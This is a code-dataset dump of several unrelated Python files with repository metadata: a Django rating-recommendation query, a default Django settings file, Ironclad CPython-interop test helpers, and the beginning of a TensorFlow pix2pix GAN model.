params, '%(v)s.object_id NOT IN (select object_id from %(io)s where content_type_id = %(v)s.content_type_id and user_id = %%s)' % params, ], params=[content_type.id, user.id, min_score, user.id, user.id] ).distinct() return objects def update_recommendations(self): from djangoratings.models import Vote from django.db import connection, DatabaseError cursor = connection.cursor() cursor.execute('BEGIN') try: cursor.execute('TRUNCATE TABLE %s' % (self.model._meta.db_table,)) except DatabaseError: cursor.execute('DELETE FROM %s' % (self.model._meta.db_table,)) cursor.execute("""INSERT INTO %(t1)s (to_user_id, from_user_id, agrees, disagrees, exclude) SELECT v1.user_id, v2.user_id, SUM(if(v2.score = v1.score, 1, 0)) AS agrees, SUM(if(v2.score != v1.score, 1, 0)) AS disagrees, 0 FROM %(t2)s AS v1 INNER JOIN %(t2)s AS v2 ON v1.user_id != v2.user_id AND v1.object_id = v2.object_id AND v1.content_type_id = v2.content_type_id WHERE v1.user_id is not null AND v2.user_id is not null GROUP BY v1.user_id, v2.user_id HAVING agrees / (disagrees + 0.0001) > 3 ON DUPLICATE KEY UPDATE agrees=values(agrees), disagrees=values(disagrees);""" % dict( t1=self.model._meta.db_table, t2=Vote._meta.db_table, )) cursor.execute('commit') cursor.close()
true
true
f705d6c189996ed6849395984a8050289ed6a38d
3,224
py
Python
django_tdd/settings.py
migueleichler/django-tdd
5b8bd6088b5e2de4d70026b761391bce3aa52f32
[ "MIT" ]
null
null
null
django_tdd/settings.py
migueleichler/django-tdd
5b8bd6088b5e2de4d70026b761391bce3aa52f32
[ "MIT" ]
null
null
null
django_tdd/settings.py
migueleichler/django-tdd
5b8bd6088b5e2de4d70026b761391bce3aa52f32
[ "MIT" ]
null
null
null
""" Django settings for django_tdd project. Generated by 'django-admin startproject' using Django 1.9.12. For more information on this file, see https://docs.djangoproject.com/en/1.9/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.9/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = 'axh7uu^+yfch=#hjgozv%trd3ai55m%xb83=39o4n-y#gk$y6o' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'agenda', 'test_without_migrations', ] MIDDLEWARE_CLASSES = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'django_tdd.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'django_tdd.wsgi.application' # Database # 
https://docs.djangoproject.com/en/1.9/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.9/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.9/howto/static-files/ STATIC_URL = '/static/'
26
91
0.700682
import os BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) SECRET_KEY = 'axh7uu^+yfch=#hjgozv%trd3ai55m%xb83=39o4n-y#gk$y6o' DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'agenda', 'test_without_migrations', ] MIDDLEWARE_CLASSES = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'django_tdd.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'django_tdd.wsgi.application' # Database # https://docs.djangoproject.com/en/1.9/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # 
https://docs.djangoproject.com/en/1.9/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.9/howto/static-files/ STATIC_URL = '/static/'
true
true
f705d6ce7500355546b594150038c8315daf1d0a
9,140
py
Python
tests/utils/cpython.py
netcharm/ironclad
5892c43b540b216d638e0fed2e6cf3fd8289fdfc
[ "PSF-2.0" ]
null
null
null
tests/utils/cpython.py
netcharm/ironclad
5892c43b540b216d638e0fed2e6cf3fd8289fdfc
[ "PSF-2.0" ]
null
null
null
tests/utils/cpython.py
netcharm/ironclad
5892c43b540b216d638e0fed2e6cf3fd8289fdfc
[ "PSF-2.0" ]
null
null
null
from System import IntPtr from System.Runtime.InteropServices import Marshal import Ironclad from Ironclad import CPyMarshal from Ironclad.Structs import METH, Py_TPFLAGS, PyGetSetDef, PyMemberDef, PyMethodDef, PyTypeObject from tests.utils.memory import OffsetPtr def _new_struct(type_, fields, *values): struct = type_() for field, value in zip(fields, values): getattr(type_, field).SetValue(struct, value) return struct _meth_fields = 'ml_name ml_meth ml_flags ml_doc'.split() new_PyMethodDef = lambda *args: _new_struct(PyMethodDef, _meth_fields, *args) _getset_fields = 'name get set doc closure'.split() new_PyGetSetDef = lambda *args: _new_struct(PyGetSetDef, _getset_fields, *args) _member_fields = 'name type offset flags doc'.split() new_PyMemberDef = lambda *args: _new_struct(PyMemberDef, _member_fields, *args) gc_fooler = [] def GC_NotYet(dgt): gc_fooler.append(dgt) def GC_Soon(): gc_fooler.remove(dgt) return GC_Soon DELEGATE_TYPES = { METH.OLDARGS: Ironclad.dgt_ptr_ptrptr, METH.O: Ironclad.dgt_ptr_ptrptr, METH.NOARGS: Ironclad.dgt_ptr_ptrptr, METH.VARARGS: Ironclad.dgt_ptr_ptrptr, METH.KEYWORDS: Ironclad.dgt_ptr_ptrptrptr, METH.VARARGS | METH.KEYWORDS: Ironclad.dgt_ptr_ptrptrptr, } for (k, v) in DELEGATE_TYPES.items(): DELEGATE_TYPES[k | METH.COEXIST] = v def MakeMethodDef(name, implementation, flags, doc="doc"): dgt = DELEGATE_TYPES[flags](implementation) return new_PyMethodDef(name, Marshal.GetFunctionPointerForDelegate(dgt), int(flags), doc), GC_NotYet(dgt) def MakeGetSetDef(name, get, set, doc, closure=IntPtr.Zero): deallocs = [] _get = IntPtr.Zero if get: getdgt = Ironclad.dgt_ptr_ptrptr(get) _get = Marshal.GetFunctionPointerForDelegate(getdgt) deallocs.append(GC_NotYet(getdgt)) _set = IntPtr.Zero if set: setdgt = Ironclad.dgt_int_ptrptrptr(set) _set = Marshal.GetFunctionPointerForDelegate(setdgt) deallocs.append(GC_NotYet(setdgt)) return new_PyGetSetDef(name, _get, _set, doc, closure), lambda: map(apply, deallocs) def MakeMemberDef(name, type_, offset, 
flags, doc="doc"): return new_PyMemberDef(name, int(type_), offset, flags, doc), lambda: None MAKETYPEPTR_DEFAULTS = { "tp_name": "Nemo", "tp_doc": "Odysseus' reply to the blinded Cyclops", "ob_refcnt": 1, "tp_basicsize": 8, "tp_itemsize": 4, "tp_flags": Py_TPFLAGS.HAVE_CLASS, "tp_methods": None, "tp_members": None, "tp_getset": None, "tp_init": None, "tp_iter": None, "tp_iternext": None, "tp_base": IntPtr.Zero, "tp_bases": IntPtr.Zero, "tp_as_number": IntPtr.Zero, } def GetMapperTypePtrDefaults(mapper): return { "ob_type": mapper.PyType_Type, "tp_alloc": mapper.PyType_GenericAlloc, "tp_new": mapper.PyType_GenericNew, "tp_dealloc": mapper.IC_PyBaseObject_Dealloc, "tp_free": mapper.PyObject_Free, } PTR_ARGS = ("ob_type", "tp_base", "tp_bases", "tp_as_number", "tp_as_sequence", "tp_as_mapping") INT_ARGS = ("ob_refcnt", "tp_basicsize", "tp_itemsize", "tp_flags") STRING_ARGS = ("tp_name", "tp_doc") TABLE_ARGS = ("tp_methods", "tp_members", "tp_getset") FUNC_ARGS = { "tp_alloc": Ironclad.dgt_ptr_ptrint, "tp_new": Ironclad.dgt_ptr_ptrptrptr, "tp_init": Ironclad.dgt_int_ptrptrptr, "tp_dealloc": Ironclad.dgt_void_ptr, "tp_free": Ironclad.dgt_void_ptr, "tp_getattr": Ironclad.dgt_ptr_ptrstr, "tp_iter": Ironclad.dgt_ptr_ptr, "tp_iternext": Ironclad.dgt_ptr_ptr, "tp_call": Ironclad.dgt_ptr_ptrptrptr, "tp_str": Ironclad.dgt_ptr_ptr, "tp_repr": Ironclad.dgt_ptr_ptr, "tp_richcompare": Ironclad.dgt_ptr_ptrptrint, "tp_compare": Ironclad.dgt_int_ptrptr, "tp_hash": Ironclad.dgt_int_ptr, } def WriteTypeField(typePtr, name, value): if name in PTR_ARGS: CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, value) return lambda: None if name in INT_ARGS: CPyMarshal.WriteIntField(typePtr, PyTypeObject, name, int(value)) return lambda: None if name in STRING_ARGS: ptr = Marshal.StringToHGlobalAnsi(value) CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, ptr) return lambda: Marshal.FreeHGlobal(ptr) if name in TABLE_ARGS: ptr, dealloc = MakeItemsTablePtr(value) 
CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, ptr) return dealloc if name in FUNC_ARGS: if value is not None: dgt = FUNC_ARGS[name](value) CPyMarshal.WriteFunctionPtrField(typePtr, PyTypeObject, name, dgt) return GC_NotYet(dgt) return lambda: None raise KeyError("WriteTypeField can't handle %s, %s" % (name, value)) def MakeTypePtr(mapper, params, allocator=None): fields = dict(MAKETYPEPTR_DEFAULTS) fields.update(GetMapperTypePtrDefaults(mapper)) fields.update(params) deallocs = [] typeSize = Marshal.SizeOf(PyTypeObject) if allocator: # pretend this was constructed by a C extension, using the mapper's allocator # hence mapper should do the deallocation itself typePtr = allocator.Alloc(typeSize) else: typePtr = Marshal.AllocHGlobal(typeSize) deallocs.append(lambda: Marshal.FreeHGlobal(typePtr)) CPyMarshal.Zero(typePtr, typeSize) for field, value in fields.items(): deallocs.append(WriteTypeField(typePtr, field, value)) def dealloc(): for f in deallocs: f() return typePtr, dealloc def MakeItemsTablePtr(items): if not items: return IntPtr.Zero, lambda: None itemtype = items[0].__class__ typesize = Marshal.SizeOf(itemtype) size = typesize * (len(items) + 1) tablePtr = Marshal.AllocHGlobal(size) CPyMarshal.Zero(tablePtr, size) for i, item in enumerate(items): Marshal.StructureToPtr(item, OffsetPtr(tablePtr, typesize * i), False) def dealloc(): Marshal.DestroyStructure(tablePtr, itemtype) Marshal.FreeHGlobal(tablePtr) return tablePtr, dealloc NUMSEQMAP_METHODS = { "nb_negative": Ironclad.dgt_ptr_ptr, "nb_positive": Ironclad.dgt_ptr_ptr, "nb_absolute": Ironclad.dgt_ptr_ptr, "nb_invert": Ironclad.dgt_ptr_ptr, "nb_int": Ironclad.dgt_ptr_ptr, "nb_long": Ironclad.dgt_ptr_ptr, "nb_float": Ironclad.dgt_ptr_ptr, "nb_oct": Ironclad.dgt_ptr_ptr, "nb_hex": Ironclad.dgt_ptr_ptr, "nb_index": Ironclad.dgt_ptr_ptr, "nb_add": Ironclad.dgt_ptr_ptrptr, "nb_subtract": Ironclad.dgt_ptr_ptrptr, "nb_multiply": Ironclad.dgt_ptr_ptrptr, "nb_divide": Ironclad.dgt_ptr_ptrptr, 
"nb_floor_divide": Ironclad.dgt_ptr_ptrptr, "nb_true_divide": Ironclad.dgt_ptr_ptrptr, "nb_remainder": Ironclad.dgt_ptr_ptrptr, "nb_divmod": Ironclad.dgt_ptr_ptrptr, "nb_lshift": Ironclad.dgt_ptr_ptrptr, "nb_rshift": Ironclad.dgt_ptr_ptrptr, "nb_and": Ironclad.dgt_ptr_ptrptr, "nb_xor": Ironclad.dgt_ptr_ptrptr, "nb_or": Ironclad.dgt_ptr_ptrptr, "nb_inplace_add": Ironclad.dgt_ptr_ptrptr, "nb_inplace_subtract": Ironclad.dgt_ptr_ptrptr, "nb_inplace_multiply": Ironclad.dgt_ptr_ptrptr, "nb_inplace_divide": Ironclad.dgt_ptr_ptrptr, "nb_inplace_floor_divide": Ironclad.dgt_ptr_ptrptr, "nb_inplace_true_divide": Ironclad.dgt_ptr_ptrptr, "nb_inplace_remainder": Ironclad.dgt_ptr_ptrptr, "nb_inplace_lshift": Ironclad.dgt_ptr_ptrptr, "nb_inplace_rshift": Ironclad.dgt_ptr_ptrptr, "nb_inplace_and": Ironclad.dgt_ptr_ptrptr, "nb_inplace_xor": Ironclad.dgt_ptr_ptrptr, "nb_inplace_or": Ironclad.dgt_ptr_ptrptr, "nb_nonzero": Ironclad.dgt_int_ptr, "nb_power": Ironclad.dgt_ptr_ptrptrptr, "nb_inplace_power": Ironclad.dgt_ptr_ptrptrptr, "sq_item": Ironclad.dgt_ptr_ptrint, "sq_concat": Ironclad.dgt_ptr_ptrptr, "sq_repeat": Ironclad.dgt_ptr_ptrint, "sq_slice": Ironclad.dgt_ptr_ptrintint, "sq_ass_item": Ironclad.dgt_int_ptrintptr, "sq_ass_slice": Ironclad.dgt_int_ptrintintptr, "sq_length": Ironclad.dgt_int_ptr, "sq_contains": Ironclad.dgt_int_ptrptr, "mp_length": Ironclad.dgt_int_ptr, "mp_subscript": Ironclad.dgt_ptr_ptrptr, "mp_ass_subscript": Ironclad.dgt_int_ptrptrptr, } def MakeNumSeqMapMethods(_type, slots): size = Marshal.SizeOf(_type) ptr = Marshal.AllocHGlobal(size) CPyMarshal.Zero(ptr, size) deallocs = [] for (slot, func) in slots.items(): dgt = NUMSEQMAP_METHODS[slot](func) CPyMarshal.WriteFunctionPtrField(ptr, _type, slot, dgt) deallocs.append(GC_NotYet(dgt)) def dealloc(): for f in deallocs: f() Marshal.FreeHGlobal(ptr) return ptr, dealloc
35.426357
110
0.67954
from System import IntPtr from System.Runtime.InteropServices import Marshal import Ironclad from Ironclad import CPyMarshal from Ironclad.Structs import METH, Py_TPFLAGS, PyGetSetDef, PyMemberDef, PyMethodDef, PyTypeObject from tests.utils.memory import OffsetPtr def _new_struct(type_, fields, *values): struct = type_() for field, value in zip(fields, values): getattr(type_, field).SetValue(struct, value) return struct _meth_fields = 'ml_name ml_meth ml_flags ml_doc'.split() new_PyMethodDef = lambda *args: _new_struct(PyMethodDef, _meth_fields, *args) _getset_fields = 'name get set doc closure'.split() new_PyGetSetDef = lambda *args: _new_struct(PyGetSetDef, _getset_fields, *args) _member_fields = 'name type offset flags doc'.split() new_PyMemberDef = lambda *args: _new_struct(PyMemberDef, _member_fields, *args) gc_fooler = [] def GC_NotYet(dgt): gc_fooler.append(dgt) def GC_Soon(): gc_fooler.remove(dgt) return GC_Soon DELEGATE_TYPES = { METH.OLDARGS: Ironclad.dgt_ptr_ptrptr, METH.O: Ironclad.dgt_ptr_ptrptr, METH.NOARGS: Ironclad.dgt_ptr_ptrptr, METH.VARARGS: Ironclad.dgt_ptr_ptrptr, METH.KEYWORDS: Ironclad.dgt_ptr_ptrptrptr, METH.VARARGS | METH.KEYWORDS: Ironclad.dgt_ptr_ptrptrptr, } for (k, v) in DELEGATE_TYPES.items(): DELEGATE_TYPES[k | METH.COEXIST] = v def MakeMethodDef(name, implementation, flags, doc="doc"): dgt = DELEGATE_TYPES[flags](implementation) return new_PyMethodDef(name, Marshal.GetFunctionPointerForDelegate(dgt), int(flags), doc), GC_NotYet(dgt) def MakeGetSetDef(name, get, set, doc, closure=IntPtr.Zero): deallocs = [] _get = IntPtr.Zero if get: getdgt = Ironclad.dgt_ptr_ptrptr(get) _get = Marshal.GetFunctionPointerForDelegate(getdgt) deallocs.append(GC_NotYet(getdgt)) _set = IntPtr.Zero if set: setdgt = Ironclad.dgt_int_ptrptrptr(set) _set = Marshal.GetFunctionPointerForDelegate(setdgt) deallocs.append(GC_NotYet(setdgt)) return new_PyGetSetDef(name, _get, _set, doc, closure), lambda: map(apply, deallocs) def MakeMemberDef(name, type_, offset, 
flags, doc="doc"): return new_PyMemberDef(name, int(type_), offset, flags, doc), lambda: None MAKETYPEPTR_DEFAULTS = { "tp_name": "Nemo", "tp_doc": "Odysseus' reply to the blinded Cyclops", "ob_refcnt": 1, "tp_basicsize": 8, "tp_itemsize": 4, "tp_flags": Py_TPFLAGS.HAVE_CLASS, "tp_methods": None, "tp_members": None, "tp_getset": None, "tp_init": None, "tp_iter": None, "tp_iternext": None, "tp_base": IntPtr.Zero, "tp_bases": IntPtr.Zero, "tp_as_number": IntPtr.Zero, } def GetMapperTypePtrDefaults(mapper): return { "ob_type": mapper.PyType_Type, "tp_alloc": mapper.PyType_GenericAlloc, "tp_new": mapper.PyType_GenericNew, "tp_dealloc": mapper.IC_PyBaseObject_Dealloc, "tp_free": mapper.PyObject_Free, } PTR_ARGS = ("ob_type", "tp_base", "tp_bases", "tp_as_number", "tp_as_sequence", "tp_as_mapping") INT_ARGS = ("ob_refcnt", "tp_basicsize", "tp_itemsize", "tp_flags") STRING_ARGS = ("tp_name", "tp_doc") TABLE_ARGS = ("tp_methods", "tp_members", "tp_getset") FUNC_ARGS = { "tp_alloc": Ironclad.dgt_ptr_ptrint, "tp_new": Ironclad.dgt_ptr_ptrptrptr, "tp_init": Ironclad.dgt_int_ptrptrptr, "tp_dealloc": Ironclad.dgt_void_ptr, "tp_free": Ironclad.dgt_void_ptr, "tp_getattr": Ironclad.dgt_ptr_ptrstr, "tp_iter": Ironclad.dgt_ptr_ptr, "tp_iternext": Ironclad.dgt_ptr_ptr, "tp_call": Ironclad.dgt_ptr_ptrptrptr, "tp_str": Ironclad.dgt_ptr_ptr, "tp_repr": Ironclad.dgt_ptr_ptr, "tp_richcompare": Ironclad.dgt_ptr_ptrptrint, "tp_compare": Ironclad.dgt_int_ptrptr, "tp_hash": Ironclad.dgt_int_ptr, } def WriteTypeField(typePtr, name, value): if name in PTR_ARGS: CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, value) return lambda: None if name in INT_ARGS: CPyMarshal.WriteIntField(typePtr, PyTypeObject, name, int(value)) return lambda: None if name in STRING_ARGS: ptr = Marshal.StringToHGlobalAnsi(value) CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, ptr) return lambda: Marshal.FreeHGlobal(ptr) if name in TABLE_ARGS: ptr, dealloc = MakeItemsTablePtr(value) 
CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, ptr) return dealloc if name in FUNC_ARGS: if value is not None: dgt = FUNC_ARGS[name](value) CPyMarshal.WriteFunctionPtrField(typePtr, PyTypeObject, name, dgt) return GC_NotYet(dgt) return lambda: None raise KeyError("WriteTypeField can't handle %s, %s" % (name, value)) def MakeTypePtr(mapper, params, allocator=None): fields = dict(MAKETYPEPTR_DEFAULTS) fields.update(GetMapperTypePtrDefaults(mapper)) fields.update(params) deallocs = [] typeSize = Marshal.SizeOf(PyTypeObject) if allocator: # hence mapper should do the deallocation itself typePtr = allocator.Alloc(typeSize) else: typePtr = Marshal.AllocHGlobal(typeSize) deallocs.append(lambda: Marshal.FreeHGlobal(typePtr)) CPyMarshal.Zero(typePtr, typeSize) for field, value in fields.items(): deallocs.append(WriteTypeField(typePtr, field, value)) def dealloc(): for f in deallocs: f() return typePtr, dealloc def MakeItemsTablePtr(items): if not items: return IntPtr.Zero, lambda: None itemtype = items[0].__class__ typesize = Marshal.SizeOf(itemtype) size = typesize * (len(items) + 1) tablePtr = Marshal.AllocHGlobal(size) CPyMarshal.Zero(tablePtr, size) for i, item in enumerate(items): Marshal.StructureToPtr(item, OffsetPtr(tablePtr, typesize * i), False) def dealloc(): Marshal.DestroyStructure(tablePtr, itemtype) Marshal.FreeHGlobal(tablePtr) return tablePtr, dealloc NUMSEQMAP_METHODS = { "nb_negative": Ironclad.dgt_ptr_ptr, "nb_positive": Ironclad.dgt_ptr_ptr, "nb_absolute": Ironclad.dgt_ptr_ptr, "nb_invert": Ironclad.dgt_ptr_ptr, "nb_int": Ironclad.dgt_ptr_ptr, "nb_long": Ironclad.dgt_ptr_ptr, "nb_float": Ironclad.dgt_ptr_ptr, "nb_oct": Ironclad.dgt_ptr_ptr, "nb_hex": Ironclad.dgt_ptr_ptr, "nb_index": Ironclad.dgt_ptr_ptr, "nb_add": Ironclad.dgt_ptr_ptrptr, "nb_subtract": Ironclad.dgt_ptr_ptrptr, "nb_multiply": Ironclad.dgt_ptr_ptrptr, "nb_divide": Ironclad.dgt_ptr_ptrptr, "nb_floor_divide": Ironclad.dgt_ptr_ptrptr, "nb_true_divide": Ironclad.dgt_ptr_ptrptr, 
"nb_remainder": Ironclad.dgt_ptr_ptrptr, "nb_divmod": Ironclad.dgt_ptr_ptrptr, "nb_lshift": Ironclad.dgt_ptr_ptrptr, "nb_rshift": Ironclad.dgt_ptr_ptrptr, "nb_and": Ironclad.dgt_ptr_ptrptr, "nb_xor": Ironclad.dgt_ptr_ptrptr, "nb_or": Ironclad.dgt_ptr_ptrptr, "nb_inplace_add": Ironclad.dgt_ptr_ptrptr, "nb_inplace_subtract": Ironclad.dgt_ptr_ptrptr, "nb_inplace_multiply": Ironclad.dgt_ptr_ptrptr, "nb_inplace_divide": Ironclad.dgt_ptr_ptrptr, "nb_inplace_floor_divide": Ironclad.dgt_ptr_ptrptr, "nb_inplace_true_divide": Ironclad.dgt_ptr_ptrptr, "nb_inplace_remainder": Ironclad.dgt_ptr_ptrptr, "nb_inplace_lshift": Ironclad.dgt_ptr_ptrptr, "nb_inplace_rshift": Ironclad.dgt_ptr_ptrptr, "nb_inplace_and": Ironclad.dgt_ptr_ptrptr, "nb_inplace_xor": Ironclad.dgt_ptr_ptrptr, "nb_inplace_or": Ironclad.dgt_ptr_ptrptr, "nb_nonzero": Ironclad.dgt_int_ptr, "nb_power": Ironclad.dgt_ptr_ptrptrptr, "nb_inplace_power": Ironclad.dgt_ptr_ptrptrptr, "sq_item": Ironclad.dgt_ptr_ptrint, "sq_concat": Ironclad.dgt_ptr_ptrptr, "sq_repeat": Ironclad.dgt_ptr_ptrint, "sq_slice": Ironclad.dgt_ptr_ptrintint, "sq_ass_item": Ironclad.dgt_int_ptrintptr, "sq_ass_slice": Ironclad.dgt_int_ptrintintptr, "sq_length": Ironclad.dgt_int_ptr, "sq_contains": Ironclad.dgt_int_ptrptr, "mp_length": Ironclad.dgt_int_ptr, "mp_subscript": Ironclad.dgt_ptr_ptrptr, "mp_ass_subscript": Ironclad.dgt_int_ptrptrptr, } def MakeNumSeqMapMethods(_type, slots): size = Marshal.SizeOf(_type) ptr = Marshal.AllocHGlobal(size) CPyMarshal.Zero(ptr, size) deallocs = [] for (slot, func) in slots.items(): dgt = NUMSEQMAP_METHODS[slot](func) CPyMarshal.WriteFunctionPtrField(ptr, _type, slot, dgt) deallocs.append(GC_NotYet(dgt)) def dealloc(): for f in deallocs: f() Marshal.FreeHGlobal(ptr) return ptr, dealloc
true
true
f705d6e28e10770948eaf92986fd5dda9272df1d
19,432
py
Python
model.py
UrusuLambda/pix2pix-tensorflow
9b1e832494f8b8b36ad2d0331cb5feda5bd65ce0
[ "MIT" ]
1,014
2016-11-25T14:03:59.000Z
2022-03-26T14:57:07.000Z
model.py
Chediak/pix2pix-tensorflow
ba40020706ad3a1fbefa1da7bc7a05b7b031fb9e
[ "MIT" ]
35
2016-11-27T14:31:40.000Z
2020-10-19T15:37:14.000Z
model.py
Chediak/pix2pix-tensorflow
ba40020706ad3a1fbefa1da7bc7a05b7b031fb9e
[ "MIT" ]
349
2016-11-25T15:50:09.000Z
2022-02-28T21:16:21.000Z
from __future__ import division import os import time from glob import glob import tensorflow as tf import numpy as np from six.moves import xrange from ops import * from utils import * class pix2pix(object): def __init__(self, sess, image_size=256, batch_size=1, sample_size=1, output_size=256, gf_dim=64, df_dim=64, L1_lambda=100, input_c_dim=3, output_c_dim=3, dataset_name='facades', checkpoint_dir=None, sample_dir=None): """ Args: sess: TensorFlow session batch_size: The size of batch. Should be specified before training. output_size: (optional) The resolution in pixels of the images. [256] gf_dim: (optional) Dimension of gen filters in first conv layer. [64] df_dim: (optional) Dimension of discrim filters in first conv layer. [64] input_c_dim: (optional) Dimension of input image color. For grayscale input, set to 1. [3] output_c_dim: (optional) Dimension of output image color. For grayscale input, set to 1. [3] """ self.sess = sess self.is_grayscale = (input_c_dim == 1) self.batch_size = batch_size self.image_size = image_size self.sample_size = sample_size self.output_size = output_size self.gf_dim = gf_dim self.df_dim = df_dim self.input_c_dim = input_c_dim self.output_c_dim = output_c_dim self.L1_lambda = L1_lambda # batch normalization : deals with poor initialization helps gradient flow self.d_bn1 = batch_norm(name='d_bn1') self.d_bn2 = batch_norm(name='d_bn2') self.d_bn3 = batch_norm(name='d_bn3') self.g_bn_e2 = batch_norm(name='g_bn_e2') self.g_bn_e3 = batch_norm(name='g_bn_e3') self.g_bn_e4 = batch_norm(name='g_bn_e4') self.g_bn_e5 = batch_norm(name='g_bn_e5') self.g_bn_e6 = batch_norm(name='g_bn_e6') self.g_bn_e7 = batch_norm(name='g_bn_e7') self.g_bn_e8 = batch_norm(name='g_bn_e8') self.g_bn_d1 = batch_norm(name='g_bn_d1') self.g_bn_d2 = batch_norm(name='g_bn_d2') self.g_bn_d3 = batch_norm(name='g_bn_d3') self.g_bn_d4 = batch_norm(name='g_bn_d4') self.g_bn_d5 = batch_norm(name='g_bn_d5') self.g_bn_d6 = batch_norm(name='g_bn_d6') self.g_bn_d7 = 
batch_norm(name='g_bn_d7') self.dataset_name = dataset_name self.checkpoint_dir = checkpoint_dir self.build_model() def build_model(self): self.real_data = tf.placeholder(tf.float32, [self.batch_size, self.image_size, self.image_size, self.input_c_dim + self.output_c_dim], name='real_A_and_B_images') self.real_B = self.real_data[:, :, :, :self.input_c_dim] self.real_A = self.real_data[:, :, :, self.input_c_dim:self.input_c_dim + self.output_c_dim] self.fake_B = self.generator(self.real_A) self.real_AB = tf.concat([self.real_A, self.real_B], 3) self.fake_AB = tf.concat([self.real_A, self.fake_B], 3) self.D, self.D_logits = self.discriminator(self.real_AB, reuse=False) self.D_, self.D_logits_ = self.discriminator(self.fake_AB, reuse=True) self.fake_B_sample = self.sampler(self.real_A) self.d_sum = tf.summary.histogram("d", self.D) self.d__sum = tf.summary.histogram("d_", self.D_) self.fake_B_sum = tf.summary.image("fake_B", self.fake_B) self.d_loss_real = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits, labels=tf.ones_like(self.D))) self.d_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits_, labels=tf.zeros_like(self.D_))) self.g_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits_, labels=tf.ones_like(self.D_))) \ + self.L1_lambda * tf.reduce_mean(tf.abs(self.real_B - self.fake_B)) self.d_loss_real_sum = tf.summary.scalar("d_loss_real", self.d_loss_real) self.d_loss_fake_sum = tf.summary.scalar("d_loss_fake", self.d_loss_fake) self.d_loss = self.d_loss_real + self.d_loss_fake self.g_loss_sum = tf.summary.scalar("g_loss", self.g_loss) self.d_loss_sum = tf.summary.scalar("d_loss", self.d_loss) t_vars = tf.trainable_variables() self.d_vars = [var for var in t_vars if 'd_' in var.name] self.g_vars = [var for var in t_vars if 'g_' in var.name] self.saver = tf.train.Saver() def load_random_samples(self): data = 
